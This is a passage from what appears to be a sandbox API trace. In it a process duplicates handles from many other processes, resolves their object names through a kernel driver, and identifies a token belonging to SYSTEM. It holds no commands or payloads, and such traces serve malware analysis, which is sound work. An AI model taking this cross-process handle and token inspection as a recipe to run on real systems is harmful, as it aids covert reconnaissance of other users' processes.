[0198.091] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80025f68e0, HandleInformation=0x0) returned 0x0 [0198.091] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.091] PsReleaseProcessExitSynchronization () returned 0x2 [0198.091] ObfDereferenceObject (Object=0xfffffa80031fe210) returned 0x11 [0198.091] ObQueryNameString (in: Object=0xfffffa80025f68e0, ObjectNameInfo=0xfffffa8003198044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003198044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.091] ObfDereferenceObject (Object=0xfffffa80025f68e0) returned 0x2 [0198.092] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.092] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc0090 | out: hHeap=0x320000) returned 1 [0198.092] CloseHandle (hObject=0xc0) returned 1 [0198.092] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xb34) returned 0xc0 [0198.092] GetCurrentProcess () returned 0xffffffffffffffff [0198.092] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x38, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0198.092] CloseHandle (hObject=0xc0) returned 1 [0198.092] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.092] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x80) returned 0x344c50 [0198.093] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0198.093] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0198.093] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc0090 [0198.093] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0198.093] PsLookupProcessByProcessId (in: ProcessId=0xb34, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.093] PsAcquireProcessExitSynchronization () returned 0x0 [0198.093] KeStackAttachProcess (in: PROCESS=0xfffffa80031fe210, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80031fe210, ApcState=0xfffff880052b35d0) [0198.093] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002617160, HandleInformation=0x0) returned 0x0 [0198.093] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.093] PsReleaseProcessExitSynchronization () returned 0x2 [0198.093] ObfDereferenceObject (Object=0xfffffa80031fe210) returned 0x11 [0198.094] ObQueryNameString (in: Object=0xfffffa8002617160, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.094] ObfDereferenceObject (Object=0xfffffa8002617160) returned 0x2 [0198.094] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.094] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc0090 | out: hHeap=0x320000) returned 1 [0198.094] CloseHandle (hObject=0xc4) returned 1 [0198.094] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x494) returned 0xc4 [0198.094] GetCurrentProcess () returned 0xffffffffffffffff [0198.094] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x20, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0198.094] CloseHandle (hObject=0xc4) returned 1 [0198.095] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.095] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x78) returned 0x344c50 [0198.095] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0198.095] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0198.095] NtQueryInformationProcess (in: ProcessHandle=0xc0, ProcessInformationClass=0x0, ProcessInformation=0x12d538, ProcessInformationLength=0x30, ReturnLength=0x12d4b0 | out: ProcessInformation=0x12d538, ReturnLength=0x12d4b0) returned 0xc0000022 [0198.095] CloseHandle (hObject=0xc0) returned 1 [0198.095] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x78c) returned 0xc0 [0198.095] GetCurrentProcess () returned 0xffffffffffffffff [0198.095] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0198.095] CloseHandle (hObject=0xc0) returned 1 [0198.096] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.096] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x78) returned 0x344c50 [0198.096] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0198.096] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0198.096] NtQueryInformationThread (in: ThreadHandle=0xc4, ThreadInformationClass=0x0, ThreadInformation=0x12d508, ThreadInformationLength=0x30, ReturnLength=0x12d4b0 | out: ThreadInformation=0x12d508, ReturnLength=0x12d4b0) returned 0xc0000022 [0198.096] CloseHandle (hObject=0xc4) returned 1 [0198.096] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xa24) returned 0xc4 [0198.096] GetCurrentProcess () returned 0xffffffffffffffff [0198.097] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0xbc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0198.097] CloseHandle (hObject=0xc4) returned 1 [0198.097] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.097] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x78) returned 0x344c50 [0198.097] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0198.097] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0198.097] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc0090 [0198.097] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0198.097] PsLookupProcessByProcessId (in: ProcessId=0xa24, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.097] PsAcquireProcessExitSynchronization () returned 0x0 [0198.097] KeStackAttachProcess (in: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0) [0198.097] ObReferenceObjectByHandle (in: Handle=0xbc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80023219c0, HandleInformation=0x0) returned 0x0 [0198.098] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.098] PsReleaseProcessExitSynchronization () returned 0x2 [0198.098] ObfDereferenceObject (Object=0xfffffa80028f3060) returned 0x22 [0198.098] ObQueryNameString (in: Object=0xfffffa80023219c0, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.098] ObfDereferenceObject (Object=0xfffffa80023219c0) returned 0x3 [0198.098] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.098] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc0090 | out: hHeap=0x320000) returned 1 [0198.098] CloseHandle (hObject=0xc0) returned 1 [0198.098] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xa24) returned 0xc0 [0198.099] GetCurrentProcess () returned 0xffffffffffffffff [0198.099] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0198.099] CloseHandle (hObject=0xc0) returned 1 [0198.099] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.099] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x88) returned 0x360b50 [0198.099] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x360b50, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x360b50, ReturnLength=0x0) returned 0x0 [0198.099] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x360b50 | out: hHeap=0x320000) returned 1 [0198.099] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc0090 [0198.099] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0198.099] PsLookupProcessByProcessId (in: ProcessId=0xa24, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.100] PsAcquireProcessExitSynchronization () returned 0x0 [0198.100] KeStackAttachProcess (in: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0) [0198.100] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001f375e0, HandleInformation=0x0) returned 0x0 [0198.100] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.100] PsReleaseProcessExitSynchronization () returned 0x2 [0198.100] ObfDereferenceObject (Object=0xfffffa80028f3060) returned 0x22 [0198.100] ObQueryNameString (in: Object=0xfffffa8001f375e0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.100] ObfDereferenceObject (Object=0xfffffa8001f375e0) returned 0x2 [0198.100] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.100] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc0090 | out: hHeap=0x320000) returned 1 [0198.100] CloseHandle (hObject=0xc4) returned 1 [0198.101] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xa24) returned 0xc4 [0198.101] GetCurrentProcess () returned 0xffffffffffffffff [0198.101] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0xa4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0198.101] CloseHandle (hObject=0xc4) returned 1 [0198.101] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.101] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x88) returned 0x360b50 [0198.101] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x360b50, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x360b50, ReturnLength=0x0) returned 0x0 [0198.101] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x360b50 | out: hHeap=0x320000) returned 1 [0198.101] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc0090 [0198.101] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0198.102] PsLookupProcessByProcessId (in: ProcessId=0xa24, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.102] PsAcquireProcessExitSynchronization () returned 0x0 [0198.102] KeStackAttachProcess (in: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0) [0198.102] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002c25360, HandleInformation=0x0) returned 0x0 [0198.102] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.102] PsReleaseProcessExitSynchronization () returned 0x2 [0198.102] ObfDereferenceObject (Object=0xfffffa80028f3060) returned 0x22 [0198.102] ObQueryNameString (in: Object=0xfffffa8002c25360, ObjectNameInfo=0xfffffa800310e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800310e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.105] ObfDereferenceObject (Object=0xfffffa8002c25360) returned 0x3 [0198.105] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.106] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc0090 | out: hHeap=0x320000) returned 1 [0198.106] CloseHandle (hObject=0xc0) returned 1 [0198.106] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0xa24) returned 0xc0 [0198.106] GetCurrentProcess () returned 0xffffffffffffffff [0198.106] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xa0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0198.106] CloseHandle (hObject=0xc0) returned 1 [0198.106] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.106] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x80) returned 0x360b50 [0198.106] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x360b50, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0x360b50, ReturnLength=0x0) returned 0x0 [0198.107] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x360b50 | out: hHeap=0x320000) returned 1 [0198.107] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc0090 [0198.107] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc0090*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0198.107] PsLookupProcessByProcessId (in: ProcessId=0xa24, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.107] PsAcquireProcessExitSynchronization () returned 0x0 [0198.107] KeStackAttachProcess (in: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80028f3060, ApcState=0xfffff880052b35d0) [0198.107] ObReferenceObjectByHandle (in: Handle=0xa0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a003d5ea00, HandleInformation=0x0) returned 0x0 [0198.107] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.107] PsReleaseProcessExitSynchronization () returned 0x2 [0198.107] ObfDereferenceObject (Object=0xfffffa80028f3060) returned 0x22 [0198.107] ObQueryNameString (in: Object=0xfffff8a003d5ea00, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.107] ObfDereferenceObject (Object=0xfffff8a003d5ea00) returned 0x2 [0198.108] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.108] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc0090 | out: hHeap=0x320000) returned 1 [0198.108] CloseHandle (hObject=0xc4) returned 1 [0198.108] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x614) returned 0xc4 [0198.108] GetCurrentProcess () returned 0xffffffffffffffff [0198.108] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0xc4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0198.108] CloseHandle (hObject=0xc4) returned 1 [0198.108] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.108] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x78) returned 0x344c50 [0198.108] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0198.109] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0198.109] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc0090 [0198.109] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc0090*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0198.109] PsLookupProcessByProcessId (in: ProcessId=0x614, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.109] PsAcquireProcessExitSynchronization () returned 0x0 [0198.109] KeStackAttachProcess (in: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8003176060, ApcState=0xfffff880052b35d0) [0198.109] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0198.109] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.109] PsReleaseProcessExitSynchronization () returned 0x2 [0198.109] ObfDereferenceObject (Object=0xfffffa8003176060) returned 0x1e [0198.109] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa800306b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.109] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0x12 [0198.109] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.110] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc0090 | out: hHeap=0x320000) returned 1 [0198.110] CloseHandle (hObject=0xc0) returned 1 [0198.110] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x98c) returned 0xc0 [0198.110] GetCurrentProcess () returned 0xffffffffffffffff [0198.110] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x34, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0198.110] CloseHandle (hObject=0xc0) returned 1 [0198.110] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.110] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x78) returned 0x344c50 [0198.110] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0198.110] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0198.110] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x98c) returned 0xc0 [0198.111] GetCurrentProcess () returned 0xffffffffffffffff [0198.111] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x34, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x8, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc8) returned 1 [0198.111] CloseHandle (hObject=0xc0) returned 1 [0198.111] GetTokenInformation (in: TokenHandle=0xc8, TokenInformationClass=0x1, TokenInformation=0x12dbc0, TokenInformationLength=0x800, ReturnLength=0x12d4b4 | out: TokenInformation=0x12dbc0, ReturnLength=0x12d4b4) returned 1 [0198.111] LookupAccountSidW (in: lpSystemName="", Sid=0x12dbd0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12d9b0, cchName=0x12d4bc, ReferencedDomainName=0x12d7a0, cchReferencedDomainName=0x12d4b8, peUse=0x12d4e8 | out: Name="SYSTEM", cchName=0x12d4bc, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12d4b8, peUse=0x12d4e8) returned 1 [0198.115] GetTokenInformation (in: TokenHandle=0xc8, TokenInformationClass=0xa, TokenInformation=0x12d568, TokenInformationLength=0x38, ReturnLength=0x12d4b4 | out: TokenInformation=0x12d568, ReturnLength=0x12d4b4) returned 1 [0198.115] GetLastError () returned 0x32 [0198.116] SetLastError (dwErrCode=0x32) [0198.116] GetLastError () returned 0x32 [0198.116] SetLastError (dwErrCode=0x32) [0198.116] CloseHandle (hObject=0xc8) returned 1 [0198.116] CloseHandle (hObject=0xc4) returned 1 [0198.116] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x9f4) returned 0xc4 [0198.116] GetCurrentProcess () returned 0xffffffffffffffff [0198.116] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x1d0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc8) returned 1 [0198.116] CloseHandle (hObject=0xc4) returned 1 [0198.116] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0198.116] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x78) returned 0x344c50 [0198.117] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x344c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x344c50, ReturnLength=0x0) returned 0x0 [0198.117] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x344c50 | out: hHeap=0x320000) returned 1 [0198.117] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0198.117] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0198.117] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0198.117] PsAcquireProcessExitSynchronization () returned 0x0 [0198.117] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880052b35d0) [0198.117] ObReferenceObjectByHandle (in: Handle=0x1d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003a7bd70, HandleInformation=0x0) returned 0x0 [0198.117] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0198.117] PsReleaseProcessExitSynchronization () returned 0x2 [0198.117] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x39 [0198.117] ObQueryNameString (in: Object=0xfffffa8003a7bd70, ObjectNameInfo=0xfffffa80031e3044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80031e3044, ReturnLength=0xfffff880052b3550) returned 0x0 [0198.118] ObfDereferenceObject (Object=0xfffffa8003a7bd70) returned 0x2 [0198.118] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0198.118] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0198.118] CloseHandle (hObject=0xc8) returned 1 [0198.118] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4bc) returned 0xc8 [0198.118] GetCurrentProcess () returned 0xffffffffffffffff [0198.118] DuplicateHandle (in: hSourceProcessHandle=0xc8, hSourceHandle=0x370, 